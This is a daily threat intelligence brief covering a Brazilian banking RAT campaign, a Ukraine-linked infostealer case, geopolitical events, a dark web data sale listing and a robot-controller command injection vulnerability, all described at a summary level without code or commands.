ZeroFox Daily Intelligence Brief - May 21, 2026

ZeroFox Daily Intelligence Brief - May 21, 2026

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

• Banana RAT Campaign Targets Brazilian Banking Customers
• Ukraine-Linked Infostealer Operation Hits California Online Store
• Geopolitical Focus: U.S.-Cuba Tensions, Strait of Hormuz standoff, and More

Banana RAT Campaign Targets Brazilian Banking Customers

Source: https://hackread.com/banana-rat-malware-fake-invoices-16-brazilian-banks/

What we know: Financially motivated threat group SHADOW-WATER-063 is reportedly targeting Brazilian banking customers with a remote access trojan (RAT) called Banana RAT. The campaign uses phishing links and fake invoice files distributed through WhatsApp and malicious domains to infect victims and steal money in real time.

Context: Victims are tricked into downloading a fake invoice file (Consultar_NF-e.bat) that launches hidden PowerShell commands and executes malware directly in memory using fileless techniques. Banana RAT gives attackers full remote control over infected systems, including screen monitoring, keystroke logging, and the ability to freeze user input during fraudulent banking activity.

Analyst note: The infrastructure used to generate hundreds of malware variants at scale may enable more resilient and scalable fraud campaigns against Brazilian financial institutions. The campaign could strengthen Latin American cybercrime ecosystems by increasing demand for malware obfuscation services, stolen banking access, and fraud-enablement tools.

Ukraine-Linked Infostealer Operation Hits California Online Store

Source: https://www.bleepingcomputer.com/news/security/ukraine-identifies-infostealer-operator-tied-to-28-000-stolen-accounts/

What we know: Ukrainian and U.S. authorities reportedly identified a Ukraine-linked suspect connected to an infostealer campaign targeting customers of a California-based online store between 2024 and 2025. The infostealer allegedly infected victim devices to steal browser sessions, credentials, cookies, and authentication tokens, which were then sold and used for fraudulent purchases.

Context: The operation compromised around 28,000 customer accounts, with attackers using roughly 5,800 of them to conduct unauthorized purchases worth approximately USD 721,000. Investigators reportedly seized computers, phones, storage devices, and cryptocurrency-related evidence during searches of the suspect’s residences, including infrastructure linked to the sale and management of stolen session data.

Analyst Note: The operation is likely to have supplied underground marketplaces and Telegram-based cybercrime channels with infostealer logs, compromised accounts, and stolen e-commerce access. Victims likely remain exposed to account takeover, identity theft, fraudulent purchases, and follow-on phishing activity if the stolen logs remain in circulation and credentials have not been reset.

Geopolitical Focus: U.S.-Cuba Tensions, Strait of Hormuz standoff, and More

• U.S. prosecutors charged former Cuban President Raúl Castro in connection with the 1996 shootdown of two civilian planes over Cuba that killed four people, including three American citizens. Meanwhile, the USS Nimitz entered the southern Caribbean as part of the Trump administration's pressure campaign against Cuba.
• The Islamic Revolutionary Guard Corps (IRGC) is enforcing a strict, multi-tiered clearance system on the Strait of Hormuz, charging up to USD 150,000 for safe passage. It prioritizes Russian, Chinese, and allied vessels, requiring others to undergo document reviews and physical inspections that can delay transit for up to a week.
• The IRGC warned on May 20, 2026, that any renewed attack on Iran would trigger widespread retaliation beyond the region. Nuclear and Strait of Hormuz negotiations remain stalled, with Tehran's latest proposal demanding war reparations and guaranteed uranium enrichment rights.
• President Donald Trump said on May 20, 2026, that he intends to speak directly with Taiwan's President Lai Ching-te, marking a significant shift in diplomatic norms. Taiwan's foreign ministry confirmed Lai would welcome the call. China, which views Taiwan as its own territory, has not yet formally responded.
• At least 21 people were killed in torrential rain across southern and central China. Schools, businesses, and transport services have been suspended, with authorities allocating USD 22 million in disaster relief.

DEEP AND DARK WEB INTELLIGENCE

Breachforums[.]rs user KrolikHacking: Untested threat actor "KrolikHacking" has advertised an alleged dataset associated with Tavily, a real‑time search engine for AI agents, on dark web forum breachforums[.]rs. The actor claims that the dataset contains over one million user records, including their full names, email addresses, and hashed passwords, though no data samples were offered to prospective buyers.

VULNERABILITY AND EXPLOIT INTELLIGENCE

CVE-2026-8153: This is a command injection vulnerability in the Dashboard Server interface of Universal Robots PolyScope 5 – an operating system (OS) for collaborative robots. The flaw enables an unauthenticated attacker with network access to execute remote commands on the system, and gain full control of the robot system. Successful exploitation is very likely to result in manipulation of robot operations, and potential physical safety hazards to personnel operating affected systems.

Affected products: PolyScope 5 versions prior to 5.25.1